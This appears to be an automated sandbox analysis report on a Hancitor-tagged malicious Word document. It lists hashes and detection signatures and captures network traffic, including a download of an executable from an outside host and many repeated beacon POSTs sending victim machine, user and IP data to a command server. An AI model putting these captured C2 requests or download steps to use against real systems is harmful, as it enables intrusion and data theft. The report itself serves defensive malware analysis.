Analysis Report 1118_8732615.doc

Overview

General Information

Sample Name: 1118_8732615.doc
Analysis ID: 319766
MD5: 0f75ad40daec01aee7642795cc544bb3
SHA1: 76334ccc6e92d579495671de47664180517cdf05
SHA256: afba9deb16b5100c5964ca33cd42c2aa6b972ad104efd3d58e0ad8b7070cd5f4
Tags: doc, Hancitor, macros

Detection

Hidden Macro 4.0 Hancitor
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Hancitor
Allocates memory in foreign processes
Contains functionality to inject threads in other processes
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
May check the online IP address of the machine
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: 1118_8732615.doc Virustotal: Detection: 15%
Source: 1118_8732615.doc ReversingLabs: Detection: 12%
Machine Learning detection for sample
Source: 1118_8732615.doc Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.rundll32.exe.6f830000.2.unpack Avira: Label: TR/Hijacker.Gen

Location Tracking:

Yara detected Hancitor
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6848, type: MEMORY

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F832CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_6F832CD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F832D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_6F832D17
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F832D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_6F832D98
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F832D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_6F832D55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F832D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext, 3_2_6F832D78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F864250 FindFirstFileExA, 3_2_6F864250

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: 22.mp4.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\rundll32.exe
Allocates a big amount of memory (probably used for heap spraying)
Source: winword.exe Memory has grown: Private usage: 0MB later: 73MB
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: api.ipify.org
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.7:49731 -> 54.235.142.93:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.7:49731 -> 54.235.142.93:80

Networking:

May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 18 Nov 2020 15:34:59 GMT
    Content-Type: application/octet-stream
    Content-Length: 272910
    Connection: keep-alive
    Last-Modified: Tue, 10 Nov 2020 13:28:24 GMT
    ETag: "5faa9578-42a0e"
    Accept-Ranges: bytes
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 54.235.142.93
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox View ASN Name: ITL-BG
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
    GET / HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: api.ipify.org
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: duarreecto.ru
    Content-Length: 120
    Cache-Control: no-cache
    Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected:
    GET /f44.exe HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: sturtevantforcongress.com
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
